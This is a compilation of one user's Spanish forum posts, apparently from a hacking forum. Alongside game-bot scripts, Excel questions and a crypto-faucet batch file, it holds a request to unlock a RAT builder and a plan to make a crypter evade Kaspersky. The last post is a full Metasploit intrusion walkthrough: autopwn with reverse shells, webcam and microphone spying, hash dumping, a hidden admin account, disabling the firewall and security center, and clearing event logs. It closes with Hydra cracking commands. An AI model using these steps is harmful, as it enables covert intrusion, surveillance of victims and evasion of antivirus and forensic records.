ImageSearch, X, Y, 495, 105, 675, 140,*100 N7.bmp ; -7
If ( Errorlevel = 0 ){
Random, X1N7 , 745, 746
Random, Y1N7 , 245, 246
Random, X2N7 , 825, 826
Random, Y2N7 , 325, 335
Random, TN7 , 10, 12 ; [Speed 0 (Fastest) to 100 (Slowest)]
Random, T1N7 , 140, 150
MouseClickDrag, Left, X1N7, Y1N7, X2N7, Y2N7 , %TN7%
Sleep, %T1N7%
}
ImageSearch, X, Y, 495, 105, 675, 140,*100 N8.bmp ; -8
If ( Errorlevel = 0 )
{
Random, X1N8 , 750, 751
Random, Y1N8 , 245, 246
Random, X2N8 , 830, 831
Random, Y2N8 , 325, 335
Random, TN8 , 10, 12 ; [Speed 0 (Fastest) to 100 (Slowest)]
Random, T1N8 , 140, 150
MouseClickDrag, Left, X1N8, Y1N8, X2N8, Y2N8 , %TN8%
Sleep, %T1N8%
}
ImageSearch, X, Y, 495, 105, 675, 140,*100 N9.bmp ; -9
If ( Errorlevel = 0 )
{
Random, X1N9 , 755, 756
Random, Y1N9 , 245, 246
Random, X2N9 , 835, 836
Random, Y2N9 , 325, 335
Random, TN9 , 10, 12 ; [Speed 0 (Fastest) to 100 (Slowest)]
Random, T1N9 , 140, 150
MouseClickDrag, Left, X1N9, Y1N9, X2N9, Y2N9 , %TN9%
Sleep, %T1N9%
}
ImageSearch, X, Y, 495, 105, 675, 140,*100 N10.bmp ; -10
If ( Errorlevel = 0 )
{
Random, X1N10 , 760, 761
Random, Y1N10 , 245, 246
Random, X2N10 , 840, 841
Random, Y2N10 , 325, 335
Random, TN10 , 10, 12 ; [Speed 0 (Fastest) to 100 (Slowest)]
Random, T1N10 , 140, 150
MouseClickDrag, Left, X1N10, Y1N10, X2N10, Y2N10 , %TN10%
Sleep, %T1N10%
}
ImageSearch, X, Y, 485, 60, 680, 100,*90 Finish.bmp
If ( Errorlevel = 0 )
{
Random, T4F , 7000, 8000
Sleep, %T4F%
}
}
Esc:: ExitApp


Nota el ultimo script cada imagen bmp se hace con print screen (captura de pantalla) pegando en  mspaint y salvandola en bmp 24 bit. Todo muy basico realizado por un novato como yo en solicitud de alguien mas ducho en desarrocho de Autohotkey.

Otra combinación puede ser mobizen + autohotkey pero no funcionara la busqueda de imagenes de ni de pixeles por culpa de Mobizen.

Igual si alguien tiene algo mas potente en python es bienvenido. Solo con fines educativos y no me hago responsable del mal uso de lo publicado.

#14
Scripting / Autohotkey + Mobizen
17 Septiembre 2015, 05:46 AM
Es muy buena combinacion en algunos casos Autohotkey + bluestack cuando se nos ocurre hacer un bot para algunos juegos de Android. Pero a veces el juego que deseamos no esta funcional en bluestack. Entonces comienza los problemas.
Autohotkey me parece que al menos en windows es uno de los mas completos para automatizar algo, aunque he visto cosas sorprendentes al menos para mi nivel desde python.
Sucede que no consigo usar la funcion ImagenSearch de Autohotkey tras conectar un smartphone con android a una pc con windows a traves de Mobizen que en mi opinion es el mejor referente al tema de actualizacion de pantalla ya que muchos solo logran entre 1 a 5 fps y esto es un limitante si deseamos automatizar algo que vaya un tanto rapido ya tendriamos que hacer una suposicion de recorrido.
Todo esto me va dando vueltas en la cabeza en lo que me llegan las cosas de Arduino + Webcam para a traves de Opencv, Python lograr un T.A.P BOT (Touch Assistan Player).
Asi que acepto cualquier criterio para lograr algo con Autohotkey + Mobizen que no sea solo click a traves de coordenadas.
En lo particular estoy probando con Flappy Bird pero no consigo nada aun al menos con Autohotkey + Mobizen.
Como quedaría una Imagensearch en este caso o que realmente impide que funcione esta relacionada a los 30fps de la actualizacion de video.


#15
Partiendo de un terminal Android 2.3.4 rooteado y con Busybox

wget http://ftp.linux.hr/android/nmap/nmap-6.46-android-arm-bin.tar.bz2
cd  /sdcard/donwload
tar -jxvf nmap-6.46-android-arm-bin.tar.bz2
mkdir /data/local/nmap
cp /sdcard/nmap-6.46/bin/* /data/local/nmap
cp /sdcard/nmap-6.46/share/nmap/*services* /data/local/nmap
chmod 777 /data/local/nmap/*
mount -o rw,remount -t yaffs2 /dev/block/mtdblock3 /system
ln -s /data/local/nmap/nmap /system/xbin/nmap
mount -o ro,remount -t yaffs2 /dev/block/mtdblock3 /system
nmap --version

Saludos
Si alguien tiene alguna de las Top 125 Network Security Tools http://sectools.org/ en un terminal Android por favor postear acá.
#16
Scripting / Faucet
31 Marzo 2015, 06:57 AM
Alguna idea para mejorar esto ya sea en rendimiento, ganancia en crypto-moneda, recomendacion, etc , cualquier duda preguntar:

Todo publicado sin referidos ya que no es el objetivo acá.


Requistos
Microsoft® Windows® Server 2003 Resource Kit Tools para que funcione sleep.
Billeteras:
Bitcoin y Dogecoin
Registro previo en los sitios.

Codigo en versión ultra alfa :)

Faucet.bat
@echo on
start "60min" chrome https://freebitco.in/?op=home
sleep 30
start "60min" chrome https://freedoge.co.in/?op=home
sleep 30
start "15min" chrome http://777bitco.in/
sleep 30
start "60min" chrome http://crococoin.com/
sleep 30
start "5min" chrome http://moonbit.co.in/
sleep 30
start "5min" chrome http://moondoge.co.in/
sleep 30
start "60min" chrome http://faucet.bitcoinzebra.com/
sleep 30
start "10min" chrome http://boxbit.co.in/
sleep 30
start "15min" chrome http://weekendbitcoin.com/
sleep 30
start "60min" chrome http://www.bitcoins4.me/
sleep 30
start "5min" chrome http://bitcoinaliens.com/faucet/?ref=50515
sleep 30
start "30min" chrome http://www.freebitcoins.me
sleep 30
start "5min" chrome http://www.scoremybits.com/
sleep 30
start "44min" chrome http://www.bitcoinjackpot.co
sleep 30
start "60min" chrome http://btcdark.com/
sleep 30
start "30min" chrome http://manysatoshis.com/
sleep 30
start "30min" chrome http://venezuelabit.cu.cc/
sleep 30
start "60min" chrome http://botva.net/
sleep 30
start "60min" chrome http://www.luckybitfaucet.com/
sleep 30
start "60min" chrome http://www.boicoteate.com/
sleep 30
start "10min"chrome http://faucoin.com/
sleep 30
start "15min" chrome http://www.robotcoingame.com/
sleep 30
start "60min" chrome http://bitrecoin.herokuapp.com/#/
sleep 30
start "60min" chrome http://litecoin.herokuapp.com/#/
sleep 30
start "60min" chrome http://bitfaucet.herokuapp.com/#/
sleep 30
start "60min" chrome http://welovebtc.com/?track=faucetbox
sleep 30
start "60min" chrome http://infaucet.com/
sleep 30
start "30min" chrome http://www.neobitcoin.com/
sleep 30
start "30min" chrome http://wonderlandco.in/
sleep 30
start "60min" chrome http://elenabitco.in/
sleep 30
start "60min" chrome http://freebetco.in/
sleep 30
start "60min" chrome http://mezzabank.com/
sleep 30
start "60min" chrome http://qoinfaucet.com/
sleep 30
start "60min" chrome http://goldwmr.ru/
sleep 30
start "60min" chrome http://simplfaucet.com/
sleep 30
start "60min" chrome http://steep.rocks/
sleep 30
start "60min" chrome http://faucetbox.thesatoshibay.com/
sleep 30
start "6min" chrome http://playbitco.in/?track=faucetbox
sleep 30
start "60min" chrome http://freebitcoinhome.com/
sleep 30
start "120min" chrome http://bitcoinnewsday.com/
sleep 30
start "60min" chrome http://www.bitframe.co.in/faucet/
sleep 30
start "10min" chrome http://www.cmmonitor.com/btc/
sleep 30
start "45min" chrome http://alcoins.ru/
sleep 30
start "60min" chrome http://freebitfaucet.com/
sleep 30
start "120min" chrome http://generalfaucet.net/
sleep 30
start "240min" chrome http://www.jazfaucetlist.com/index.php
sleep 30
start "60min" chrome http://thefreebitcoin.website/
sleep 30
start "10min" chrome http://www.freebitcoinusa.com/
sleep 30
start "60min" chrome http://bitkran.ru/
sleep 30
start "60min" chrome http://claimco.in/
sleep 30
start "30min" chrome http://c-pay.org/
sleep 30
start "30min" chrome http://www.cryptoblox.com/faucets/BitCoin/
sleep 30
start "50min" chrome http://apcoin.pw/
sleep 30
start "30min" chrome http://leakyfaucet.uk/
sleep 30
start "60min" chrome http://xz.bitreg.net/
sleep 30
start "60min" chrome http://billser.net/
sleep 30
start "60min" chrome http://moneyinpjs.com/bitcoin-bucket/
sleep 30
start "60min" chrome http://baconfaucet.com/
sleep 30
start "180min" chrome http://faucet.altcoinhub.com/
sleep 30
start "180min" chrome http://www.rapidbitco.in/
sleep 30
start "180min" chrome http://your-bit.co.in/
sleep 30
start "60min" chrome http://destinyfaucet.com/btc/
sleep 30
start "60min" chrome http://thehouseofdiem.com/btc/
sleep 30
start "30min" chrome http://realbit.ru/
sleep 30
start "60min" chrome http://www.cryptodrips.com/
sleep 30
start "40min" chrome http://bq2.ru/
sleep 30
start "60min" chrome http://getmyfaucet.com/btc/
sleep 30
start "120min" chrome http://www.faucetmania.com/
sleep 30
start "10min" chrome http://www.100freebit.com/
sleep 30
start "60min" chrome http://satoshibear.com/
sleep 30
start "60min" chrome http://www.freebtcoins.com/
sleep 30
start "30min" chrome http://profaucet.net/
sleep 30
start "30min" chrome http://bitverts.com/
sleep 30
start "60min" chrome http://captchas.rocks/
sleep 30
start "240min" chrome http://www.theleakyspigot.com/btc/
sleep 30
start "180min" chrome http://moarthan.co.uk/btc/
sleep 30
start "30min" chrome http://www.getbtc.ru/
sleep 30
start "30min" chrome http://www.thefaucetrunner.com/faucet/
sleep 30
start "30min" chrome http://myfunnyfarm.website/
sleep 30
start "30min" chrome http://www.bitblogshare.com/
sleep 30
start "60min" chrome http://www.1000satoshi.com/
sleep 30
start "60min" chrome http://bitcoinspace.net/faucet/
sleep 30
start "30min" chrome http://bitcoinminingxd.com/
sleep 30
start "30min" chrome http://underwaterbtc.tk/
sleep 30
start "60min" chrome http://powbit.com/
sleep 30
start "120min" chrome http://f3-btc.com/
sleep 30
start "15min" chrome http://bitcoin-kran.com/
sleep 30
start "360min" chrome http://faucetbox.bitcoinr.cz/
sleep 30
start "60min" chrome http://farmblogfaucet.myfunnyfarm.website/
sleep 30
start "60min" chrome http://altafaucet.cu.cc/
sleep 30
start "60min" chrome http://satoshi.jecool.net/
sleep 30
start "30min" chrome http://bit.coinbanned.com/
sleep 30
start "15min" chrome http://www.bitcoinnow.cu.cc/
sleep 30
start "5min" chrome http://bitcointrux.com/
sleep 30
start "5min" chrome http://mybitcoinfree.com/
sleep 30
start "240min" chrome http://faucet.bitlist.website/
sleep 30
start "360min" chrome http://faucet.bitcoin-source.com/
sleep 30
start "5min" chrome http://bitcoinfast.org/
sleep 30
start "60min" chrome http://coin.maweb.eu/
sleep 30
start "60min" chrome http://bitcoin.imgxd.com/
sleep 30
start "60min" chrome http://www.coinsclear.com/
sleep 30
start "60min" chrome http://btc-cool.com/
sleep 30
start "60min" chrome http://www.cashcat.eu/faucet/
sleep 30
start "60min" chrome http://www.faucet.jecool.net/
sleep 30
start "60min" chrome http://ronbitko.ru/
sleep 30
start "30min" chrome http://btccanabank.com/
sleep 30
start "15min" chrome http://moneyinpjs.com/bitcoin4free/
sleep 30
start "48min" chrome http://www.additionalincome.eu/faucet/
sleep 30
start "120min" chrome http://www.warhammer-coin.com/
sleep 30
start "60min" chrome http://justfreebtc.com/
sleep 30
start "60min" chrome http://btc.rkharz.in/
sleep 30
start "30min" chrome http://moneyinpjs.com/fast-bitcoin/
sleep 30
start "60min" chrome http://bizznes.net/
sleep 30
start "60min" chrome http://freebtcfaucet.com/
sleep 30
start chrome http://getyourfreebitcoins.com/
sleep 30
start "30min" chrome http://bitcoin.mka.biz.ua/
sleep 30
start "75min" chrome http://www.bitcoin-a.pl/
sleep 30
start "240min" chrome http://faucet.is-great.net/
sleep 30
start "320min" chrome http://freebtc-faucet.com/
sleep 30
start "30min" chrome http://starcoin.eu/
sleep 30
start chrome http://123.bitcoinaplenty.com/
sleep 30
start "8min" chrome http://redfaucet.pw/
sleep 30
start "60min" chrome http://moneyinpjs.com/bitfaucet/
sleep 30
start "240min" chrome http://btcgiveaway.com/
sleep 30
start "30min" chrome http://faucet.coinbanned.com/
sleep 30
start "60min" chrome http://www.satoshi4free.fr/faucets/faucetbox/
sleep 30
start "60min" chrome http://faucet.bodylaw.ru/
sleep 30
start "180min" chrome http://btctap.tk/
sleep 30
start "120min" chrome http://neobits.ru/
sleep 30
start "90min" chrome http://spektrumfaucet.mine.nu/
sleep 30
start "60 min" chrome http://freebits.ru/
sleep 30
start "180min" chrome http://btcearn.ml/
sleep 30
start "60min" chrome http://www.satoshis.gratis/
sleep 30
start "60min" chrome http://freebitcoin.in/faucet/
sleep 30
start "60min" chrome http://www.cobrashome.de/
sleep 30
start "60min" chrome http://bitcoingift.nx.tc/
sleep 30
start "60min" chrome http://moneyinpjs.com/bitcoin-land/
sleep 30
start "60min" chrome http://gibitcoins.me/
sleep 30
start "17min" chrome http://77bitcoins.com/
sleep 30
start "30min" chrome http://extrabitfaucet.com/
sleep 30
start "15min" chrome http://bitganancias.com/
sleep 30
start "60min" chrome http://btcoinwall.com/
sleep 30
start "60min" chrome http://greenfaucet.cf/
sleep 30
start chrome http://speedbit.biz/
sleep 30
start "60min" chrome http://www.buzzmyway.com/faucet/
sleep 30
start "60min" chrome http://hotswap.co/
sleep 30
start "30min" chrome http://bit-faucets.tk/
sleep 30
start "30min" chrome http://bit-faucets.gq/
sleep 30
start chrome http://www.coingets.com/
sleep 30
start "60min" chrome http://www.bitgo.zz.vc/
sleep 30
start chrome http://crypto-bitcoin-faucet.tk/
sleep 30
start "30min" chrome http://bit-faucets.cf/
sleep 30
start "30min" chrome http://faucet.jumadil-awal.com/
sleep 30
start "720min" chrome http://www.freakfaucet.com/faucet.php
sleep 30
start chrome http://btc.jecool.net/
sleep 30
start "180min" chrome http://bandindie.com/faucet/
sleep 30
start chrome http://bitcoinra.in/
sleep 30
start chrome http://bitcoinads.ml/
sleep 30
start chrome http://best-bit.ru/free/
sleep 30
start chrome http://criptof.ru/
sleep 30
start chrome http://cravebit.com/
sleep 30
start chrome http://sunbit.pe.hu/
sleep 30
start chrome http://bit-faucets.ga/
sleep 30
start chrome http://btc4all.wc.lt/
sleep 30
start chrome http://freebitcoinfaucet.esy.es/
sleep 30
start chrome http://btc.justfaucet.net/
sleep 30
start chrome http://styleswimsuit.com/
sleep 30
start chrome http://www.bitcoinfaucet.club/
sleep 30
start chrome http://www.freesatoshi.website/
sleep 30
start chrome http://btc.btcae.net/
sleep 30
start chrome http://www.onlinux.co.uk/
sleep 30
start "60min" chrome http://hybryda2005.pl/faucet/btc/
sleep 30
start "60min" chrome http://free-unlimited.wc.lt/
sleep 30
start "60min" chrome http://zarabianie-w-sieci.biz.pl/faucet/bt/
sleep 30
start "25min" chrome http://25satoshi.ru/
sleep 30
start "15min" chrome http://car-faucet.netne.net/
sleep 30
start chrome http://bitcoin.faucet.fr/
sleep 30
start chrome http://littledogsbtc.byethost13.com/index.php
sleep 30
start chrome http://200btc.ru/
sleep 30
start chrome http://btcbros.website/
sleep 30
start chrome http://777.candyfaucet.com/
sleep 30
start chrome http://voultfaucet.cf/
sleep 30
start chrome http://faucet.clixbitco.in/
sleep 30
start chrome http://candyfaucet.com/
sleep 30
start chrome http://ifaucet.net/bitcoin/faucetbox/
sleep 30
start chrome http://bithell.io/
sleep 30
start chrome http://paidbitco.in/
sleep 30
start chrome http://200btc.ru/
sleep 30
start chrome http://scoremybits.com/
sleep 30
start chrome http://www.forbit.co.in/
sleep 30
start chrome http://www.caribit.co.in/
sleep 30
start chrome http://bitcoinfast.org/
exit
#17
Redes / Cada navegador con una IP
8 Marzo 2015, 05:49 AM
Usando Windows XP Sp3 y navegadores x (chrome, opera, firefox, etc) de que manera se puede lograr que cada navegador abierto tenga una ip distinta es decir:

Todas bajo una misma PC con un solo dispositivo de red cableado 212.1.101.1
chrome 212.1.101.1
chrome 212.1.200.2
chrome 212.1.11.3
chrome 212.1.100.4
chrome 212.1.99.5

Otra duda en un ordenador con wifi + ethernet ambos conectados a internet, como se puede determinar el camino que toman las aplicaciones de red, es decir:

chrome 212.1.101.1 ethernet
chrome 192.168.0.1 wifi

Muchas gracias a todos aquellos que lean asi como a cualquiera que pueda dar una pista sobre temas relacionados, posibles soluciones o recomendaciones, etc.




#18
Scripting / Ayuda con Excel
22 Febrero 2015, 19:29 PM
No se si esto va aquí pero no encuentro un mejor lugar para ponerlo:
Se tiene:
CitarColumnA ColumnB
1             1,2
2             1,3
3             4,0
4             3,0
5             5,1
6             0,0
7             1,5
8             1,7
9             1,2
10           1,5

Se desea conocer la mayor salida de números consecutivos inferiores a < 2


La Respuesta seria 4 ya que:
Citar7             1,5
8             1,7
9             1,2
10           1,5

4>2 para la tirada que antecede:
CitarColumnA ColumnB
1             1,2
2             1,3

Estoy leyendo =CONTAR.SI(B2:B1000;"<2") pero daria una cuenta de todos los valores menors que 2.
Cualquier recomendacion es bienvenida siguo en google y con la ayuda de Excel.

Gracias.
#19
Scripting / Ayuda con Bat o Vbs
20 Febrero 2015, 08:37 AM
En Windows Xp Sp3

Partiendo de:
Fichero1.txt
Fichero2.txt
Fichero3.txt

Con contenido de tipo y solo una sola linea por fichero como muestra el ejemplo
Fichero1.txt
asdadasdasdasd asdsadas asdasdasd cash out: 1.97 asdasdas asdasda

Fichero2.txt
asdadasdasdasd asdsadas asdasdasd cash out: 212.34 asdasdas asdasda

Fichero3.txt
asdadasdasdasd asdsadas asdasdasd cash out: 1232.97 asdasdas asdasda

Como seria un bat o vbs que como resultado diera un fichero

Fichero4.txt

Con contenido:
cash out: 1.97
cash out: 212.34
cash out: 1232.97

Alguna recomendación, tengo conocimientos muy básicos en programación
Estoy por leer mas sobre el comando find o findstr en windows el cual pocas veces he utilizado y luego seria algo como
>Fichero4.txt

Mas no se como hacer en bat o vbs para que abran los fichero uno a uno en orden.

Gracias por leer igual estoy buscando sobre el tema, cualquier comentario, ayuda o etc es bienvenida.
#20
El escenario es el siguiente.
Servidor
201.10.10.10 Server OpenSSH puerto 443
Windows Xp Pro Sp3 Spanish

Cliente
190.3.2.1 Cliente SSH Putty puerto dinámico 9010
Privoxy apuntando al sock del tunnel SSH creado con putty y prestando servicio por el 8118.
Windows 7 Ultimate Sp1 Spanish


Sin Privoxy
El tunnel ssh entre 190.3.2.1 y 201.10.10.10 creado por el puerto dinámico 9010 funciona y al consultar el cliente (190.3.2.1) su ip en http://readip.info/ le dice que el mismo es  201.10.10.10 (server).

Con Privoxy
Ahora sucede que no todas las aplicaciones de internet soportan socks4 o socks4a o socks5, por lo que se decidió montar privoxy detras del tunnel ssh en el cliente (190.3.2.1). Las conexiones una vez mas funcionan exitosamente pero al consultar la ip el  en  cliente (190.3.2.1) en http://readip.info/ sale 190.3.2.1 y no 201.10.10.10 (server) como en el caso anterior.

Pregunta  :o
¿Alguien sabe porque sucede esto, alguna recomendacion para el config.txt del privoxy?

Anexo.
Privoxy esta pensado para funcionar con TOR de ahi su configuracion por defecto 127.0.0.1:9050 pero no veo que en TOR comprometa el IP del cliente, porque sucede asi cuando se pone detrás de un tunnel ssh.

Gracias por leer y es bienvenido cualquier comentario, igual sigo buscando la respuesta.  ;)
#21
https://anonfiles.com/file/a1637ecd4cc98ed3b945a8ac9eec3145

Alguien conoce o tiene alguna forma de hallar el usario y contraseña solicitado por este RAT para iniciar el cliente y desde el acceder a todas las opciones como crear el server.

En muchos sitios sale usuario:Mauro contraseña: ProSpy1 pero no me funciona, tengo la versión anterior y asumo que esta esta mejor aun.

Al parecer el creador Mauro murió en un accidente de transito pero esta info no se si es real aun la lei en algunos sitios


Saludos.




#22
Ingeniería Inversa / Ayuda con ImportREConstructor
27 Septiembre 2013, 07:14 AM
Estoy intentando hacer un unpacking de Avfucker que esta comprimido con FSG 2.0. He visto varios tutoriales y realizado busquedas en google pero no obtengo resultados. Esta claro que el OEP es 7E35C el cual lo mismo se puede obtener con Peid que con el plugin Ollydump o simplemente con Ollydbg. Pero a la hora de utilizar el  ImportREConstructor es cuando vienen mis problemas porque no entiendo bien la parte de entrar RVA y el Size correspondiente. En algunos tutoriales he visto que ponen RVA 1000 y Size 1000 justificando que la size es demasiado larga en algunos casos como dice el buscador de IAT pero nada no me funciona. Nunca he podido hacer los cut thunk de los invalidos porque ponga lo que ponga se marca todo y no las FFFFFF como sale en los tutoriales. El tutorial que normalmente sale con msheart me sale bien todo pero a la hora de poner la practica sobre este fichero nada.

Por que necesito Avfucker sin compresion?
Lo necesito porque tengo un dsplit que no detectan los antivirus y quiero poner en practica este software para que el KAV no detecte al AVfucker como un vir32tool.
Esto no puedo hacerlo si el fichero esta comprimido con FSG 2.0 porque tendria que editarlo con cualquier editor hexadecimal para lograr el objetivo.

Saludos a todos y gracias a los que aunque sea lean estas lineas, sigo en mi busqueda y si no lo logro igual aprendere cosas nuevas.

#23
Software / Proteccion de DVD
19 Agosto 2012, 02:01 AM
Hola he buscado ya en el foro y quizas no lo encuentro porque es dificil buscar una proteccion cuando no se conoce mucho del tema. El problema es el siguente tengo una serie de PC dvd games que quisiera hacerles imagen ISO pero suceden que todos estos tienen un circulo casi perfecto rayado que desconozco si consiste en una proteccion y como se llama o simplemente estas rayados por otro motivo.Uno vez conocido el nombre de esta proteccion buscar un programa que me permita lograr mi objetivo.

Es decir con el nombre de esta proteccion ya soy feliz y si me recomiendan un programa mejor.

Saludos a todos y gracias aunque sea por leerme.
#24
Hacking / Sitios PTC
22 Julio 2012, 23:46 PM
Ok me imagino que casi todos los que lean ya sepan de que va el PTC (paid to click)
Algunos de los sitios en que ya estoy.
http://www.awsurveys.com/
http://www.bigmoneyptc.com/
http://www.ganardineroreal.com/
http://kiclicks.com/
https://www.clixsense.com/
http://www.buxcraft.com/
http://www.ptcbox.com/
http://www.justbeenpaid.com/

Lista de algunos falsos
http://10dolares.traviesus.com/?p=37

En fin llevo poco dias en el desarrollo y deseo saber o debatir con ustedes formas legales de introducir dinero en una cuenta paypal recien creada en blanco.

En fin agradeceria cualqueir recomendacion para subir un poco mas rapido porqque creo que solo con los PTC tendre que destinar mi primer cobro a comprar un nuevo mouse jajajaja.

Saludos

Bueno cualquier recomendacion para meter dinero en una cuenta paypal es bien venida aca.
#25
Hacking / Anotaciones
22 Julio 2012, 23:37 PM
Bueno a todos los de este excelente sitio me gustaria compartir con ustedes partes de las anotaciones que ha generado horas de tutorial, video tutoriales, foros etc.
Espero le sea de su agrado, 100% modificable libre, la pueden mejorar, debatir con los demas en fin como todos los demas no me hago resposanble de mal uso de la informacion. Asi que confio en que la sepan usar bien  ;D.
Cualquier coincidencia con los ip es pura coincidecia siempre me ha dado trabajo algunos man de linux los cuales a veces no viene con muchos ejemplos, lo cual retrasa el uso de los comandos pero aun asi siguien siendo lo maximo.
En fin good luck.



*******************************************************************************
*******************************************************************************
Perfeccionamiento de la técnica de hackeo.

Cerciorarse que no tiene KAV.
msf > db_nmap 10.10.0.4 -p 1110

-------------------------------------------------------------------------------
  • Nmap: 1110/tcp closed nfsd-status
    -------------------------------------------------------------------------------

    Conociendo a nuestra víctima.
    msf > db_nmap -T5 -A -v 10.10.0.4

    -------------------------------------------------------------------------------
    Nmap: Discovered open port 445/tcp on 10.10.0.4
  • Nmap: Discovered open port 139/tcp on 10.10.0.4
  • Nmap: Discovered open port 135/tcp on 10.10.0.4
  • Nmap: 135/tcp open  msrpc        Microsoft Windows RPC
  • Nmap: 139/tcp open  netbios-ssn
  • Nmap: 445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
  • Nmap: Running (JUST GUESSING): Microsoft Windows XP|2003|2000|PocketPC/CE|Me (98%), Microsoft embedded (94%), Juniper Windows 2000 (94%)
    -------------------------------------------------------------------------------

    Lanzar todos los exploit conocidos a los puertos abiertos con conexión reversa.
    La víctima se conecta a nosotros no nosotros a la víctima

    msf > db_autopwn -t -e -r -p

    Interactuando con la session 1 creada en la víctima.
    msf > sessions -i 1

    Saber que está haciendo nuestra víctima.
    msf > screenshot

    Conocer que Procesos está corriendo.
    msf > ps

    Detectar si tiene webcam.
    msf > webcam_list

    Tirarle una foto a la víctima si tiene webcam.
    msf > webcam_snap 1

    Grabar audio del micrófono la víctima.
    msf > record_mic

    Descargando los hash de los usuarios de la máquina.
    msf > hashdump

    --------------------------------------------------------------------------------------
    Administrador:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
    --------------------------------------------------------------------------------------

    Pasar a CMD.
    msf > execute -f cmd.exe -i -c -H

    Ocultar de la pantalla de inicio el usuario que vamos a crear.
    c:\windows\system32> reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v loko /t REG_DWORD /d 00000000

    Parar Centro de Seguridad.
    c:\windows\system32> sc stop wscsvc

    Deshabilitar Centro de Seguridad.
    c:\windows\system32> sc config wscsvc start= disabled

    Parar Firewall de Windows.
    c:\windows\system32> sc stop sharedaccess

    Deshabilitar Firewall de Windows.
    c:\windows\system32> sc config sharedaccess start= disabled

    Habilitar Telnet.
    c:\windows\system32> sc config tlntsvr start= auto

    Iniciar Telnet.
    c:\windows\system32> sc start tlntsvr

    Conociendo detalles de la víctima.
    c:\windows\system32> systeminfo

    -------------------------------------------------------------------------------
    Nombre de host:                            JACK-PC
    Nombre del sistema operativo:              Microsoft Windows XP Professional
    Versión del sistema operativo:             5.1.2600 Service Pack 3 Compilaci?n 2600
    Fabricante del sistema operativo:          Microsoft Corporation
    Configuración del sistema operativo:       Estación de trabajo independiente
    Tipo de compilación del sistema operativo: Uniprocessor Free
    Propiedad de:                              Jack
    Organización registrada:                   Home
    Id. del producto:                          55274-640-8365391-23962
    Fecha de instalación original:             18/07/2011, 23:02:38
    Tiempo de actividad del sistema:           0 días, 0 horas, 49 minutos, 35 segundos
    Fabricante del sistema:                    innotek GmbH
    Modelo el sistema:                         VirtualBox
    Tipo de sistema:                           X86-based PC
    Procesador(es):                            1 Procesadores instalados.
                                              [01]: x86 Family 6 Model 15 Stepping 13 GenuineIntel ~438 Mhz
    Versión del BIOS:                          VBOX   - 1
    Directorio de Windows:                     C:\WINDOWS
    Directorio de sistema:                     C:\WINDOWS\system32
    Dispositivo de inicio:                     \Device\HarddiskVolume1
    Configuración regional del sistema:        0c0a
    Idioma:                                    0000040A
    Zona horaria:                              N/D
    Cantidad total de memoria física:          255 MB
    Memoria física disponible:                 150 MB
    Memoria virtual: tamaño máximo:            2.048 MB
    Memoria virtual: disponible:               2.008 MB
    Memoria virtual: en uso:                   40 MB
    Ubicación(es) de archivo de paginación:    C:\pagefile.sys
    Dominio:                                   GRUPO_TRABAJO
    Servidor de inicio de sesión:              N/D
    Revisión(es):                              1 revisión(es) instaladas.
                                              [01]: Q147222
    Tarjeta(s) de red:                         1 Tarjetas de interfaz de red instaladas.
                                              [01]: Adaptador Ethernet PCI AMD PCNET Family
                                                    Nombre de conexión: Conexión de Área local
                                                    DHCP habilitado:    No
                                                    Direcciones IP
                                                    [01]: 10.10.0.4
    -------------------------------------------------------------------------------

    Conociendo su configuración IP para ver si usa puerta de enlace.
    c:\windows\system32> ipconfig

    -------------------------------------------------------------------------------
    Configuración IP de Windows
    Adaptador Ethernet Conexión de ?rea local          :
           Sufijo de conexión específica DNS :
           Dirección IP. . . . . . . . . . . : 10.10.0.4
           Máscara de subred . . . . . . . . : 255.255.255.0
           Puerta de enlace predeterminada   : 10.10.0.1
    -------------------------------------------------------------------------------

    Conocer si usa proxy.
    HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\Internet Setting

    -------------------------------------------------------------------------------
    ProxyServer 192.168.0.1:8080
    -------------------------------------------------------------------------------

    Conocer recursos compartidos.
    c:\windows\system32> net share

    -------------------------------------------------------------------------------
    Nombre       Recurso                       Descripción
    -------------------------------------------------------------------------------
    ADMIN$       C:\WINDOWS                      Admin remota                      
    C$           C:\                             Recurso predeterminado            
    IPC$                                         IPC remota                        
    Se ha completado el comando correctamente.
    ------------------------------------------------------------------------------

    Crear usuario.
    c:\windows\system32> net user loko loko /add

    Agregarlo al grupo de administradores.
    c:\windows\system32> net localgroup administradores loko /add

    Montando recursos compartidos en nuestro explorer.
    Nota: Ojo este comando es en el CMD de nuestra PC no en Mestaploit.
    Win+R
    cmd

    C:\Users\REDES> net use z: \\10.10.0.4\c$
    -----------------------------------------------------------------------------
    Escriba el nombre de usuario para "10.10.0.4": loko
    Escriba la contraseña para 10.10.0.4: loko
    Se ha completado el comando correctamente.
    -----------------------------------------------------------------------------
    Win+E

    Una vez terminado podemos hacer click derecho desconectar o volver a CMD de nuestra PC no en Mestaploit .
    C:\Users\REDES> net use z: /delete

    Volvemos a Metasploit.

    Saliendo de CMD.
    c:\windows\system32> exit

    Limpiar eventos de windows.
    msf > clearev

    Saliendo de meterpreter.
    msf > kill

    Cualquier contratiempo siga leyendo los Anexos y perfeccione su ataque.

    *******************************************************************************
    *******************************************************************************
    Esto puede evitar algunos problemas.
    Los espacios equivalen a %20 y  %2B equivale a un "+"

    *******************************************************************************
    *******************************************************************************
    En Debian los comandos ettercap y john funcionan bajo sudo.
    $sudo ettercap -C
    $sudo john

    *******************************************************************************
    *******************************************************************************
    Conocer procesos remotos:
    C:\>tasklist /S 10.1.8.123 /u redes /p qwerty12345

    Parar procesos remotos:
    C:\>taskkill /S 10.1.8.123 /u redes /p qwerty12345 /PID 196

    *******************************************************************************
    *******************************************************************************
    Hydra se usa para crackear SMB.
    $./hydra -L users.txt -P passwords.txt example.com ftp

    *******************************************************************************
    *******************************************************************************
    Sniffer de metasploit captura hash de conexiones hacia la PC atacante.

    msf >use smb_sniffer
    msf smb_sniffer > set PWFILE=/tmp/pwtest.txt

    *******************************************************************************
    *******************************************************************************
    Generar Worldlist con John the Ripper.
    2 Caracteres todas las combinaciones posibles.
    $john -stdout=2 -incremental > /home/intrude/Worldlist.txt
    ó
    $john -stdout=2 -i > /home/intrude/Worldlist.txt

    2 Caracteres todas las letras minúsculas.
    $john -stdout=2 -i=alpha > /home/intrude/Worldlist.txt

    2 Caracteres todos los números.
    $john -stdout=2 -i=digits > /home/intrude/Worldlist.txt

